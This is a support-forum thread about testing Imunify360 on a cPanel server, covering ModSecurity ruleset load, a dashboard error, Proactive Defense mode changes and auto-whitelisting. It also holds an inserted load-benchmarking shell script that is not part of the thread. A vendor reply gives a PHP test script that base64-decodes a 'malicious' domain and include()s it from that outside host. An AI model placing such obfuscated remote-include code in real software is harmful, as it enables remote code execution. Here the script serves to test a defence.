Imunify 360, server load and some notes
Nick
Friday, 20 December 2019
Hello

I am testing Imunify360, considering switching to it or adding it alongside CSF and CXS.

It does a great job blocking wp-login brute-force attacks and has found some very old infected files that maldet and CXS were not able to detect.

But there are some issues.

Tested on a cPanel/CloudLinux server with about 500 small sites, load average 2 to 3 under normal conditions, and half of the 64 GB of memory usually free.

Disabled CXS and fail2ban, deleted all other ModSecurity vendors, then installed. CSF remains active.

1) With the full set of ModSecurity rules (25 rule sets) the server load skyrockets from 2-3 to 20-50.

Also, the peaks are very abrupt: between two or three refreshes of the top command, the load goes from e.g. 5 to 40.

Observed for many hours, hoping that it was caused by inotify indexing, but the load remained high.

Uninstalled and reinstalled 3 times, after deleting the Imunify folders under /etc/ and /var in case an accidental misconfiguration caused this behavior; same high load.

Then I switched to the minified ModSecurity ruleset and the load goes down to 3-4, almost normal, maybe 0.5 to 1 more than usual. Acceptable.

I noticed that the full set has 4 extra rulesets:

Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/116_Apps_JComponent.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/118_Apps_WPPlugin.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/119_Apps_WHMCS.conf"
Include "/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache/121_Apps_OtherApps.conf"


I enabled them one at a time.

118_Apps_WPPlugin.conf is causing about 100% more load and 121_Apps_OtherApps.conf is causing 500% to 1000% more load.

Also, when using the full ModSecurity set, even with these 4 rulesets disabled, the server has more load spikes and is somehow more unpredictable and unstable.

So the only option for this particular server is to run Imunify360 with the mini ruleset.

Maybe this is voodoo related :-), I will continue tests with other servers.

Forgot to mention that at some point I upgraded to the roll-out version; same behavior.

2) Dashboard

Dashboard graphs are not working today; I get a red error banner in the top right of the dashboard page:
Error
Internal Error

And

Failed to fetch data. Specify more narrow period or try again later.

3) Proactive Defense

When I change the Proactive Defense mode, the new mode is activated only when I manually restart the service:

systemctl restart imunify360-webshield.service

Tested with

https://docs.imunify360.com/dashboard/#user-interface

How to test Proactive Defense


4) Auto white list

I don't like the auto whitelist feature.

When someone logs in to cPanel, they get whitelisted for some hours.

That means, if someone steals a cPanel password, he is free to do anything without a firewall block.

I have changed the
AUTO_WHITELIST:
    timeout: 1440 # set in minutes how long to keep automatically whitelisted IP

from 1440 to 1, but users are still whitelisted for 3 hours.

It would be nice to have an option to disable the auto whitelist feature.
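The "enable them one at a time" measurement from point 1 above, written out as a repeatable A/B script. This is an added example, not code from the forum thread or from Imunify360: it comments out one Include line at a time in the file that carries the four quoted rulesets, reloads Apache only if the configuration still parses, samples /proc/loadavg for a fixed window, and reports how much each ruleset adds relative to the baseline. The path in MODSEC_CONF, the RUN_MEASURE switch and the sampling window are assumptions; the four ruleset file names are the ones listed in the post.

```shell
#!/bin/sh
# Added example (not from the forum post or the product): attribute the extra
# server load to individual Imunify360 ModSecurity rulesets by disabling one
# Include line at a time, reloading Apache, and comparing sampled load averages.
#
# Assumptions (placeholders, not taken from the page):
#   MODSEC_CONF    - file carrying the four "Include ..." lines quoted in the
#                    post; the default path below is hypothetical.
#   SAMPLE_SECONDS - how long to sample /proc/loadavg per configuration.
#   RUN_MEASURE=1  - actually edit the config and reload Apache (run as root).
MODSEC_CONF="${MODSEC_CONF:-/etc/apache2/conf.d/modsec_vendor_configs/imunify360_full_apache.conf}"
SAMPLE_SECONDS="${SAMPLE_SECONDS:-600}"
RULESETS="116_Apps_JComponent.conf 118_Apps_WPPlugin.conf 119_Apps_WHMCS.conf 121_Apps_OtherApps.conf"

# Rewrite file $1 in place with sed expression $2 (portable, no GNU "sed -i").
edit_in_place() {
    sed "$2" "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Comment out the Include line for ruleset $2 in config file $1.
disable_ruleset() {
    edit_in_place "$1" "s|^\([[:space:]]*\)Include \(.*/$2\"\)|\1#Include \2|"
}

# Restore the Include line for ruleset $2 in config file $1.
enable_ruleset() {
    edit_in_place "$1" "s|^\([[:space:]]*\)#Include \(.*/$2\"\)|\1Include \2|"
}

# Number of active (uncommented) Include lines in config file $1.
active_includes() {
    grep -c '^[[:space:]]*Include ' "$1" || true
}

# 1-minute load average from a /proc/loadavg-style line ("5.12 4.00 3.00 1/200 1234").
loadavg_1m() {
    printf '%s\n' "$1" | awk '{ print $1 }'
}

# Percentage by which load $2 exceeds baseline load $1, rounded as the post reports it.
load_increase_pct() {
    awk -v base="$1" -v cur="$2" 'BEGIN {
        if (base <= 0) { print "n/a"; exit }
        printf "%.0f\n", (cur - base) / base * 100
    }'
}

# Mean 1-minute load over SAMPLE_SECONDS, sampled every 10 s.
sample_load() {
    n=$(( SAMPLE_SECONDS / 10 )); [ "$n" -gt 0 ] || n=1
    i=0; sum=0
    while [ "$i" -lt "$n" ]; do
        cur=$(loadavg_1m "$(cat /proc/loadavg)")
        sum=$(awk -v s="$sum" -v l="$cur" 'BEGIN { print s + l }')
        i=$(( i + 1 ))
        sleep 10
    done
    awk -v s="$sum" -v n="$n" 'BEGIN { printf "%.2f\n", s / n }'
}

# Reload Apache only if the edited configuration still parses.
reload_apache() {
    apachectl configtest && apachectl graceful
}

# Baseline with every ruleset active, then each ruleset removed in turn.
# The increase is attributed to the ruleset that was removed.
measure_all() {
    base=$(sample_load)
    echo "baseline (all rulesets active): $base"
    for rs in $RULESETS; do
        disable_ruleset "$MODSEC_CONF" "$rs"
        reload_apache
        without=$(sample_load)
        enable_ruleset "$MODSEC_CONF" "$rs"
        reload_apache
        echo "$rs: load without it $without; it adds $(load_increase_pct "$without" "$base")%"
    done
}

# Only touch the live server when explicitly asked, so the functions can be sourced.
if [ "${RUN_MEASURE:-0}" = 1 ]; then
    measure_all
fi
```

Run it as root during a representative traffic window (RUN_MEASURE=1 sh measure_rulesets.sh) and compare samples taken at the same time of day; load average is a lagging, noisy indicator on a shared host, so a short window will not reproduce the figures in the post. If cPanel manages the vendor configuration it may rewrite the file, in which case toggling the same ruleset through the vendor UI gives the same A/B.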
Sergey Khristich, 20.12.2019 17:12:25
Hello Nick,
Thank you for reaching out!
1) This is a confirmation that the additional load caused by full ruleset varies across systems, and that is why there exists the minified ruleset. We are constantly working on making the full ruleset fast on any system with any configuration, and hopefully one of the nearest releases of full ruleset will not be causing such a significant additional load on your system.
2) This would require a ticket so that we can take a closer look into the problem.
3) Proactive Defense can be tested with the help of a script like the following one:

<?php
/* Imunify360 Proactive Defence test script */
echo "<pre>";
echo "Step 1<br>";
// Decode string with domain: 37kddsserrt.xyz
$url = base64_decode("MzdrZGRzc2VycnQueHl6");
echo "Step 2<br>";
echo "</pre>";
// Try to access a malicious domain
include($url);
die();
?>

4) This would require a ticket so that we can raise an internal feature request and have the product development team discuss and possibly implement this.
Please create a ticket here https://cloudlinux.zendesk.com/hc/en-us/requests/new and technical experts will help you asap.
If you have any other questions, feel free to ask here. Thank you for contacting us.
Marketing Manager
Myrtle Rankind, 03.02.2020 13:02:33
You did a nice job. Did you create a ticket following the link Sergey provided for you?